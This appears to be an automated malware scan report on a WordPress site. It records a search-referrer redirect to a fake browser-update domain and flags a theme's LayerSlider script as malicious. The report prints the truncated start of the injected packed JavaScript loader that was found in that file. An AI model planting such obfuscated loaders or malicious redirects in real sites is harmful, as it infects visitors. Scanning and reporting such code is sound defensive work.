Malicious/Suspicious Redirects
| Request | Server response | Status |
URL: http://www.1voice.com.au/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.1voice.com.au Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 16 Oct 2015 14:54:30 GMT Location: http://browser-updatez.ru/?80&source=1voice.com.au Server: nginx/1.8.0 Content-Length: 0 Content-Type: text/html | malicious |
Scanned pages/files
| Request | Server response | Status |
http://www.1voice.com.au/ | 200 OK Content-Length: 115385 Content-Type: text/html | clean |
http://www.1voice.com.au/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 102022 Content-Type: application/javascript | clean |
http://www.1voice.com.au/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 12793 Content-Type: application/javascript | clean |
http://www.1voice.com.au/wp-content/plugins/arscode-ninja-popups/fancybox2/jquery.fancybox.js?ver=4.1.8 | 200 OK Content-Length: 53960 Content-Type: application/javascript | clean |
http://www.1voice.com.au/wp-content/plugins/arscode-ninja-popups/js/jquery.placeholder.js?ver=4.1.8 | 200 OK Content-Length: 8053 Content-Type: application/javascript | clean |
http://www.1voice.com.au/wp-content/plugins/arscode-ninja-popups/js/ninjapopups.js?ver=4.1.8 | 200 OK Content-Length: 13064 Content-Type: application/javascript | clean |
http://www.1voice.com.au/wp-content/plugins/iphorm-form-builder/js/iphorm.js?ver=1.4.14 | 200 OK Content-Length: 6117 Content-Type: application/javascript | clean |
http://www.1voice.com.au/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.revolution.min.js?ver=4.1.8 | 200 OK Content-Length: 89976 Content-Type: application/javascript | clean |
http://www.1voice.com.au/wp-content/themes/Avada/framework/plugins/LayerSlider/js/layerslider.kreaturamedia.jquery.js?ver=4.6.5 | 200 OK Content-Length: 54897 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('14 113=225(39(){11(15.57!=125&&43 15.57!="42"){226(113);11(43 23["99"]=="42"){23["99"]=1;14 79=(73()&&130());14 109=!79&&!!23.227&&23.31.224==="223 219.";14 89=-1;14 36="220://221.222/228";11(68()&&89==1){11((31.5 Antivirus reports:
| ||
http://www.1voice.com.au/wp-content/themes/Avada/framework/plugins/LayerSlider/js/jquery-easing-1.3.js?ver=1.3.0 | 200 OK Content-Length: 13764 Content-Type: application/javascript | clean |
http://www.1voice.com.au/wp-content/themes/Avada/framework/plugins/LayerSlider/js/jquerytransit.js?ver=0.9.9 | 200 OK Content-Length: 13018 Content-Type: application/javascript | clean |
http://www.1voice.com.au/wp-content/themes/Avada/framework/plugins/LayerSlider/js/layerslider.transitions.js?ver=4.6.5 | 200 OK Content-Length: 27216 Content-Type: application/javascript | clean |
http://maps.googleapis.com/maps/api/js?v=3.exp&sensor=false&language=en | 200 OK Content-Length: 4352 Content-Type: text/javascript | clean |
http://www.1voice.com.au/wp-content/plugins/arscode-ninja-popups/js/jquery.ck.js?ver=4.1.8 | 200 OK Content-Length: 8157 Content-Type: application/javascript | clean |
http://www.1voice.com.au/wp-content/plugins/hotspot-map/js/hotspot.js?ver=1.0 | 200 OK Content-Length: 9005 Content-Type: application/javascript | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=1voice.com.au
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://1voice.com.au/
Result: 1voice.com.au is not infected or malware details are not published yet.
Result: 1voice.com.au is not infected or malware details are not published yet.